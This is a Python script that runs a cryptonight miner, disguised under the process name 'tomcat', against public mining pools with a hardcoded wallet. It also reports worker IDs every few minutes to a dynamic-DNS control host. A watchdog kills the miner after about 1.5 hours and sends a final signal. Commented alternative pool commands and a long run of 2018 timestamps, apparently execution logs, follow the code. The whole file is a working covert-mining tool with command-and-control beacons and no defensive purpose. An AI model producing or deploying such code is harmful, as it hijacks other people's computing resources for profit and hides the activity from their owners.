import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:31:01.488847
#2018-02-17 16:17:03.706471
#2018-02-17 18:06:05.466931
#2018-02-17 19:52:07.074161
#2018-02-17 21:41:05.233039
#2018-02-17 23:25:03.010783
#2018-02-18 01:14:07.247809
#2018-02-18 03:02:05.578221
#2018-02-18 04:49:02.167489
#2018-02-18 06:40:06.454896
#2018-02-18 08:29:01.863716
#2018-02-18 10:16:06.715123
#2018-02-18 12:01:06.936264
#2018-02-18 13:46:05.338506
#2018-02-18 15:37:02.105157
#2018-02-18 17:26:07.331784
#2018-02-18 19:14:04.448455
#2018-02-18 21:00:09.113419
#2018-02-18 22:45:08.588997
#2018-02-19 00:34:04.756903
#2018-02-19 02:19:01.242171
#2018-02-19 04:07:05.708566
#2018-02-19 05:51:07.169615
#2018-02-19 07:39:05.201212
#2018-02-19 09:28:05.824946
#2018-02-19 11:17:06.977231
#2018-02-19 13:05:08.670282
#2018-02-19 14:53:05.020490
#2018-02-19 16:40:08.999099
#2018-02-19 18:27:02.062034
#2018-02-19 20:13:05.665488
#2018-02-19 22:03:05.317822
#2018-02-19 23:48:08.011069
#2018-02-20 01:36:04.385370
#2018-02-20 03:24:04.331134
#2018-02-20 05:11:04.128525
#2018-02-20 06:54:06.897436
#2018-02-20 08:41:07.323076
#2018-02-20 10:25:01.406664
#2018-02-20 12:09:07.563399
#2018-02-20 13:56:08.063056
#2018-02-20 15:40:09.407426
#2018-02-20 17:27:04.655856
#2018-02-20 19:16:07.025643
#2018-02-20 21:04:08.473790
#2018-02-20 22:50:02.235223
#2018-02-21 00:34:07.451256
#2018-02-21 02:22:04.331130
#2018-02-21 04:09:01.268207
#2018-02-21 05:56:01.882064
#2018-02-21 07:44:04.024276
#2018-02-21 09:31:07.515710
#2018-02-21 11:20:01.624536
#2018-02-21 13:08:08.577070
#2018-02-21 14:56:06.165928
#2018-02-21 16:44:01.878493
#2018-02-21 18:34:08.941874
#2018-02-21 20:19:06.054234
#2018-02-21 22:09:04.211262
#2018-02-21 23:59:04.364353
#2018-02-22 01:47:01.284113
#2018-02-22 03:35:08.950641
#2018-02-22 05:23:01.238691
#2018-02-22 07:07:08.856379
#2018-02-22 08:53:02.198745
#2018-02-22 10:40:11.151644
#2018-02-22 12:28:07.301099
#2018-02-22 14:13:07.078813
#2018-02-22 16:01:05.180095
#2018-02-22 17:46:11.751138
#2018-02-22 19:34:05.942638
#2018-02-22 21:27:05.856279
#2018-02-22 23:12:07.818704
#2018-02-23 00:57:08.213195
#2018-02-23 02:46:06.610798
#2018-02-23 04:35:04.817599
#2018-02-23 06:21:06.382761
#2018-02-23 08:08:02.152119
#2018-02-23 10:24:05.893525
#2018-02-23 12:19:03.921731
#2018-02-23 14:07:05.196290
#2018-02-23 15:58:10.239052
#2018-02-23 17:44:11.363180
#2018-02-23 19:32:06.863680
#2018-02-23 21:15:09.858563
#2018-02-23 23:04:03.826094
#2018-02-24 00:53:05.580121
#2018-02-24 02:40:01.420062
#2018-02-24 04:34:03.654625
#2018-02-24 06:19:05.097554
#2018-02-24 08:07:04.014773
#2018-02-24 09:51:06.470091
#2018-02-24 11:46:06.068111
#2018-02-24 13:36:04.383855
#2018-02-24 15:23:03.368434
#2018-02-24 17:12:01.879294
#2018-02-24 19:03:04.923542
#2018-02-24 20:51:07.165410
#2018-02-24 23:10:08.938012
#2018-02-25 02:25:05.713026
#2018-02-25 06:18:03.537730
#2018-02-25 11:40:06.893584